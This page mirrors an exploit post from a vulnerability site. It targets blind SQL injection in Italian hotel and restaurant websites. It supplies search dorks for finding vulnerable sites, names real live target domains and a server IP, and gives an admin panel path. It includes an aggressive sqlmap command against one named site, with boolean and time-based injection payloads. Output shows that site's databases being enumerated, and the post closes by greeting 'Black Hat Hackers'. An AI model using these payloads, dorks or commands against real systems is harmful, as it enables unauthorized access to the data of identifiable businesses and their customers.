Italian Hotels Blind SQL Injection vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1841735 漏洞类型
发布时间 2019-11-30 更新时间 2019-11-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110181
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:Italian Hotels Blind SQL Injection vulnerability
# Date:30/11/2019
# Dork: inurl:camere-dettaglio.php?id= site:.it
        inurl:restaurant-news-detail.php?id= site:.it
        inurl:rooms-suites.php?id= site:.it 
        inurl:room.php?id= site:.it
        inurl:rooms-suites.php?id= site:.it 
# Exploit Author:H9xHacker
# Tested on:Linux

Reverse check bing.com

ip:151.11.51.124 .php?id= (There are 202 domains hosted on this server.)

# Demo
ristorantelaspada.it/en/restaurant-news-detail.php?id=32
lungarnovespucci50.com/en/camere-dettaglio.php?id=9
hotelbeyfin.com/de/rooms-suites.php?id=27

# Admin control panel path

http://www.website.com/cms-admin/

OR

http://www.website.it/cms-admin/

# Poc:

sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=32' AND 2568=2568-- AtOc

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg
---
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] ristorantelaspada_it_01
------------------------

Greets:Black Hat Hackers